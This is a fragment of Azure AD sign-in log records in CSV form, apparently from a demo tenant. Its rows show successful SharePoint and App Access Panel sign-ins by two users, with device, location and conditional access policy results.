+1228,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,47:41.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8980c5ad-b357-4e5d-9a56-dd7203a064f5,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:47,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",f680c335-bc78-44a8-8570-454364081600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,f680c335-bc78-44a8-8570-454364081600,SigninLogs,Sucess,33.7984581,-84.38828278
+1229,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,47:49.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,49d1469f-3043-0000-4704-a5ba891ff3e5,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 17:47,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",c6df9c5c-6712-4175-a3db-58cec4571700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,c6df9c5c-6712-4175-a3db-58cec4571700,SigninLogs,Sucess,33.7984581,-84.38828278
+1230,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:14.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e0cd469f-c06f-0000-5d24-934e21383c96,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",cbc0f99c-7bef-40f5-9b26-c77d445a1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,cbc0f99c-7bef-40f5-9b26-c77d445a1500,SigninLogs,Sucess,33.7984581,-84.38828278
+1231,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:56.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,1a60f8e2-c437-49e6-b2ce-d7d228075919,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:03,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",69bf3c7f-96b8-4aae-959c-a7bbea650d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,69bf3c7f-96b8-4aae-959c-a7bbea650d00,SigninLogs,Sucess,41.90428925,-85.99833679
+1232,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,07:54.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,44c1469f-a0e4-0000-5683-44b7d2c36994,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:07,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",b125da47-83a8-4791-90e4-983b9d2f0c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,b125da47-83a8-4791-90e4-983b9d2f0c00,SigninLogs,Sucess,41.90428925,-85.99833679
+1233,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:04.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6fbac2e0-aa3c-4898-a8e4-0ebae3a75efb,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",c95450b3-582d-4306-9dd2-9bda3d2a0e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,c95450b3-582d-4306-9dd2-9bda3d2a0e00,SigninLogs,Sucess,41.90428925,-85.99833679
+1234,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:57.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,54c1469f-4056-0000-54b3-36a62e1965cc,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",c95450b3-582d-4306-9dd2-9bdade310e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,c95450b3-582d-4306-9dd2-9bdade310e00,SigninLogs,Sucess,41.90428925,-85.99833679
+1235,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,09:09.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6c09bccb-a409-476a-8d75-ed3359fee41b,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:09,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",db359221-fdda-4bf1-8b37-6f46cf570e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,db359221-fdda-4bf1-8b37-6f46cf570e00,SigninLogs,Sucess,41.90428925,-85.99833679
